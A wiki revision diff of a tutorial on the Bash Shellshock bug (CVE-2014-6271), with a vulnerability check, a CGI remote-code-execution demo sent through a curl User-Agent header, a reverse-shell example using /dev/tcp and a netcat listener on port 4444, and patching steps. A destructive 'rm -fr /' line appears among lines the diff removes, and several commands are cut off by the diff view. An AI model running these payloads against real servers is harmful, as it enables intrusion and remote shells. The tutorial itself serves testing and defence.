bash:shellshock
Differences
This shows you the differences between two versions of the page.
Both sides previous revisionPrevious revisionNext revision | Previous revision | ||
bash:shellshock [2016/07/03 17:47] – peter | bash:shellshock [2020/07/15 09:30] (current) – external edit 127.0.0.1 | ||
---|---|---|---|
Line 1: | Line 1: | ||
- | ====== | + | ====== |
The Shellshock bug allows someone to remotely execute arbitrary code on systems that uses Bash. | The Shellshock bug allows someone to remotely execute arbitrary code on systems that uses Bash. | ||
Line 6: | Line 6: | ||
The Bash flaw – designated CVE-2014-6271 [http:// | The Bash flaw – designated CVE-2014-6271 [http:// | ||
+ | |||
+ | ---- | ||
===== Main Reason ===== | ===== Main Reason ===== | ||
Line 17: | Line 19: | ||
Whether these computers are actually vulnerable depends on whether they invoke Bash in an unsafe way. We already know that this is true of many web servers, and it’s believed that other types of network services could also be vulnerable. But it’ll take a while for security experts to audit various pieces of software to check for vulnerabilities. | Whether these computers are actually vulnerable depends on whether they invoke Bash in an unsafe way. We already know that this is true of many web servers, and it’s believed that other types of network services could also be vulnerable. But it’ll take a while for security experts to audit various pieces of software to check for vulnerabilities. | ||
+ | ---- | ||
===== Finding the Bug ===== | ===== Finding the Bug ===== | ||
Line 26: | Line 29: | ||
</ | </ | ||
+ | or | ||
+ | |||
+ | <code bash> | ||
+ | env ' | ||
+ | </ | ||
+ | |||
If you are vulnerable it will return: | If you are vulnerable it will return: | ||
Line 39: | Line 48: | ||
</ | </ | ||
+ | ---- | ||
===== Remote Code Execution Through Bash ===== | ===== Remote Code Execution Through Bash ===== | ||
Line 46: | Line 55: | ||
Below I explained with simple example of remote code execution through vulnerable bash. | Below I explained with simple example of remote code execution through vulnerable bash. | ||
- | |||
- | < | ||
- | rm -fr / | ||
- | </ | ||
I already have a working Apache web server with **mod_cgi** enabled and with a simple bash script to echo “CGI Bash Bug Example” and size of root filesystem. | I already have a working Apache web server with **mod_cgi** enabled and with a simple bash script to echo “CGI Bash Bug Example” and size of root filesystem. | ||
<code bash> | <code bash> | ||
- | #cat / | + | cat / |
</ | </ | ||
Line 66: | Line 71: | ||
echo `df -h / | grep -v Filesystem` | echo `df -h / | grep -v Filesystem` | ||
</ | </ | ||
+ | |||
+ | Test it: | ||
< | < | ||
- | #curl -k -H ‘User-Agent: | + | # Delete the tmp file if is exists from a previous run. |
+ | rm -fr /tmp/tmpoutput | ||
- | #tail -n1 /var/log/apache2/access.log | + | # Access the website, which runs the CGI script. |
+ | curl -k -H ‘User-Agent: | ||
- | #ls -l /tmp/sathish | + | # Check the web server logs. |
+ | tail -n1 / | ||
+ | |||
+ | # Check the output. | ||
+ | ls -l /tmp/tmpoutput | ||
</ | </ | ||
+ | |||
+ | |||
+ | So you have a cgi file named “bashbug” that does nothing but respond with “CGI bug found”. | ||
+ | |||
+ | |||
+ | ---- | ||
+ | |||
+ | ==== Example 2: Getting a reverse tcp connection from target system using /dev/tcp connection. ==== | ||
+ | |||
+ | |||
+ | In this example I had two machines, one is Kali Linux – 192.168.31.20 | ||
+ | |||
+ | From my Kali Linux machine i executed the remote command on the target Ubuntu system to create a TCP connection on port 4444 and then listen on port 4444 in my local machine using netcat. | ||
+ | |||
+ | < | ||
+ | root@kali# nc -lvp 4444 | ||
+ | |||
+ | root@kali# | ||
+ | </ | ||
+ | |||
+ | That’s it we successfully got the reverse connection of www-data user from the bash vulnerable system. | ||
+ | |||
+ | ---- | ||
+ | |||
+ | ===== Test Remote Sites ===== | ||
+ | |||
+ | If you simply want to test if websites or specific CGI scripts are vulnerable, use this link: | ||
+ | |||
+ | http:// | ||
+ | |||
+ | |||
+ | ---- | ||
+ | |||
+ | ===== Fix the Vulnerability ===== | ||
+ | |||
+ | The easiest way to fix the vulnerability is to use your default package manager to update the version of Bash. | ||
+ | |||
+ | <code bash> | ||
+ | sudo apt-get update && sudo apt-get install --only-upgrade bash | ||
+ | </ | ||
+ | |||
+ | ---- | ||
+ | |||
+ | ===== End of Life Ubuntu / Debian Releases ===== | ||
+ | |||
+ | If you are running a release of Ubuntu / Debian that is considered end of life status, you will have to upgrade to a supported to use the package manager to update Bash. The following command can be used to upgrade to a new release (it is recommended that you back up your server and important data first, in case you run into any issues): | ||
+ | |||
+ | <code bash> | ||
+ | sudo do-release-upgrade | ||
+ | </ | ||
+ | |||
+ | After the upgrade is complete, ensure that you update Bash. | ||
+ |
bash/shellshock.1467568020.txt.gz · Last modified: 2020/07/15 09:30 (external edit)